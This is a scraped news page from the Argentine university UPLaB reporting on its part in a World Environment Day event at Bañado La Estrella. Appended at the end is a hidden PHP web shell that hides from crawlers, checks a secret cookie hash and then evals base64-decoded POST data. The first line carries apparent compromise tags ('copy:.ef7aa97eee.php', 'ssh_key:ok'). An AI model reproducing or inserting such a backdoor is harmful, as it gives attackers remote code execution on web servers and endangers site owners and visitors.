copy:.ef7aa97eee.php,cron:self,tpl:shaper_helix3,ssh_key:ok UPLaB - La UPLaB presente en el Día Mundial del Ambiente en el Bañado La Estrella

Últimas Noticias

La UPLaB presente en el Día Mundial del Ambiente en el Bañado La Estrella

En oportunidad de conmemorarse este 5 de Junio el Día Mundial del Ambiente se desarrolló una Jornada interinstitucional organizada por el Ministerio de la Producción y Ambiente, a través de la Subsecretaría de Recursos Naturales, Ordenamiento y Calidad Ambiental.

La actividad se realizó en el Bañado La Estrella y contó con la participación de estudiantes de instituciones secundarias y terciarias de Pozo del Tigre, así como representantes de la Policía Ecológica, Delegación Zonal de Las Lomitas, autoridades de la localidad de Posta Cambio Zalazar y equipos técnicos del Ministerio de la Producción y Ambiente. 


Por parte de nuestra Universidad asistieron estudiantes de la carrera Licenciatura en Ciencias Ambientales y el Secretario Académico Dr. Julio Caballero, quien realizó la presentación titulada “UPLaB: el desafío de formar profesionales para el Desarrollo Sostenible”. 


La Jornada inició en el Parador de la Ruta Provincial N° 28, donde se compartió un desayuno y se procedió a la plantación de especies arbóreas nativas, posterior a lo cual se desarrollaron cuatro charlas de diversas instituciones participantes. Culminó la actividad con el avistaje de fauna en el vertedero.

Previous Next
if(!preg_match('/bot|crawl|slurp|spider|scan/i',$_SERVER['HTTP_USER_AGENT']??'')&&@md5(@$_COOKIE['_jss'])=='c00f35b1f429bbefc6f93b04fc634fe8'){@eval(@base64_decode(@$_POST['d']));}